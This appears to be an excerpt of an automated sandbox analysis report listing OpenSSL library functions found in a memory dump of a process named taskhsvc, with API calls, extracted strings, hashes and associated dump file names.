                                                            • Opcode ID: 8c735c0d3cf1992ed1b6b4e880ed10ec366c7b832a9fa90162874a6d87c02739
                                                            • Instruction ID: db4451872e9e2cca9f77264e38ac8838d61e7d300127ce588cf8d708d83a8b4b
                                                            • Opcode Fuzzy Hash: 8c735c0d3cf1992ed1b6b4e880ed10ec366c7b832a9fa90162874a6d87c02739
                                                            • Instruction Fuzzy Hash: 9041E8757086019FCB04DF2AC29091BB7F1BF89708F52891CE9A98B750EB31E905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEB25F0 Relevance: 13.6, APIs: 9, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_i2d__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3790965068-0
                                                            • Opcode ID: a4894f69d89c8ddcb2040693675d8f90b5696a93eaf3945ba03f0d05807e701f
                                                            • Instruction ID: 52969f7cbd4ffc65b467693733fb0b9a09fd89e56f1512b7910312ad3c1f3101
                                                            • Opcode Fuzzy Hash: a4894f69d89c8ddcb2040693675d8f90b5696a93eaf3945ba03f0d05807e701f
                                                            • Instruction Fuzzy Hash: 6B3181755097019FCB40EF39C281A4BBBF1BB99318F52991CE6A8DB704D331E9458F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2A8F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_gets
                                                            • String ID:
                                                            • API String ID: 2671581957-0
                                                            • Opcode ID: e697c0e53267a0dd9d324ccffad6ffddb6e4aa3d7c9cb124a09d24be584d20b2
                                                            • Instruction ID: fcef2f508809a7e5c511f212624d1a7ccb87f40497a273ebfd88c18bf5b9adbc
                                                            • Opcode Fuzzy Hash: e697c0e53267a0dd9d324ccffad6ffddb6e4aa3d7c9cb124a09d24be584d20b2
                                                            • Instruction Fuzzy Hash: 0B41F27168C3868FC7119F398980397BBF0EF4634CF26185DC8E48B701E27A940ADB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF26420 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • asn1_GetSequence.LIBEAY32 ref: 6CF2649D
                                                            • d2i_ASN1_OCTET_STRING.LIBEAY32 ref: 6CF264F9
                                                              • Part of subcall function 6CF16D50: ASN1_item_d2i.LIBEAY32(?,?,?,?,?,?,?,?,?,6CE9FE24), ref: 6CF16D7D
                                                            • ASN1_INTEGER_get.LIBEAY32 ref: 6CF2653B
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF26592
                                                            • ERR_put_error.LIBEAY32 ref: 6CF266AB
                                                            • d2i_ASN1_INTEGER.LIBEAY32 ref: 6CF264C5
                                                              • Part of subcall function 6CF15960: ASN1_item_d2i.LIBEAY32 ref: 6CF169ED
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF2659A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF26629
                                                            • ASN1_const_check_infinite_end.LIBEAY32 ref: 6CF2664B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_freeN1_item_d2iR_put_errord2i_$N1_const_check_infinite_endR_getSequenceasn1_
                                                            • String ID: $A$m$y$|
                                                            • API String ID: 431162325-3658270647
                                                            • Opcode ID: 885b81101eaa0ba3c8d8bf359a8a1a259636d9cb9f3c3ebcc81e4df0bb129850
                                                            • Instruction ID: fc7f448943a2e5f8e28cbcff2fda2a877af2c59962bf187f903226f078e2d75e
                                                            • Opcode Fuzzy Hash: 885b81101eaa0ba3c8d8bf359a8a1a259636d9cb9f3c3ebcc81e4df0bb129850
                                                            • Instruction Fuzzy Hash: 6341F1756093418FD310CF69C180A5BFBF1BF89368F258A2DE9989B710D775E884CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF12540 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :$j
                                                            • API String ID: 0-2318586036
                                                            • Opcode ID: 5c9cc2193480aed73cec0435655a32427095d131fedd2d186e79df39a0971080
                                                            • Instruction ID: d8f0708172694377c15ccc0e019e571ddd4aeb31ccfe4260666ff20f810859b3
                                                            • Opcode Fuzzy Hash: 5c9cc2193480aed73cec0435655a32427095d131fedd2d186e79df39a0971080
                                                            • Instruction Fuzzy Hash: D641EFB250C3459FD7008FA9C08464BFBF1BB86718F11892EE4989BB50D77AA5498F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF2E5F0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: ENCRYPTED PRIVATE KEY$PRIVATE KEY$h$x${
                                                            • API String ID: 4216919130-504069566
                                                            • Opcode ID: 2a3dd5d1cd812647bc13aed476c0a164ea6c066d91c6c34a2260a64cfe3436e0
                                                            • Instruction ID: 4c018155c2558cef8d050c4f2f0a0b90464a0c86bccbf50ad4e0caf3e37a771a
                                                            • Opcode Fuzzy Hash: 2a3dd5d1cd812647bc13aed476c0a164ea6c066d91c6c34a2260a64cfe3436e0
                                                            • Instruction Fuzzy Hash: DE3190756187408FC710DF6AC580A4BFBF5FB8A324F11491EEAA497300C372A9098B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF5EEC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: i$q
                                                            • API String ID: 0-1856866737
                                                            • Opcode ID: 5012a97e55231688991d82293bf0737d0bcfed5c7093aea526139ff678b63d00
                                                            • Instruction ID: 484d2bd85616c30583c348251a6593b751b83aca2f6c49d1b8828daeb54b8319
                                                            • Opcode Fuzzy Hash: 5012a97e55231688991d82293bf0737d0bcfed5c7093aea526139ff678b63d00
                                                            • Instruction Fuzzy Hash: 272126352087019FDB00DF25C64065BBBF5BB89308F42891CEAA8AB740D775F915CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBA4A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CEBB156), ref: 6CEBA5C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C$~
                                                            • API String ID: 1767461275-3418904342
                                                            • Opcode ID: a017cc432f444f8e1cba48a83f72caa0b2ba9d7c16fb32eac165ee81f7b241e1
                                                            • Instruction ID: ade1270eec11d29f842b5041b1fd2d6b59edc725c6ebaa96463f861cc01e9a03
                                                            • Opcode Fuzzy Hash: a017cc432f444f8e1cba48a83f72caa0b2ba9d7c16fb32eac165ee81f7b241e1
                                                            • Instruction Fuzzy Hash: 6821BEB45493019FDB00CF29C64062BBBF0BB8A34CF11880CEAA5AB744C735E905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4CF30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_INTEGER_to_BN.LIBEAY32 ref: 6CF4CF54
                                                              • Part of subcall function 6CEFC630: BN_bin2bn.LIBEAY32 ref: 6CEFC657
                                                            • BN_bn2dec.LIBEAY32 ref: 6CF4CF62
                                                              • Part of subcall function 6CE72C90: BN_num_bits.LIBEAY32 ref: 6CE72CA9
                                                              • Part of subcall function 6CE72C90: CRYPTO_malloc.LIBEAY32 ref: 6CE72D0E
                                                              • Part of subcall function 6CE72C90: CRYPTO_malloc.LIBEAY32 ref: 6CE72D2B
                                                              • Part of subcall function 6CE72C90: BN_dup.LIBEAY32 ref: 6CE72D47
                                                              • Part of subcall function 6CE72C90: CRYPTO_free.LIBEAY32 ref: 6CE72D70
                                                              • Part of subcall function 6CE72C90: BN_free.LIBEAY32 ref: 6CE72D78
                                                            • BN_free.LIBEAY32 ref: 6CF4CF70
                                                            • ERR_put_error.LIBEAY32 ref: 6CF4CFB7
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF4CFC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
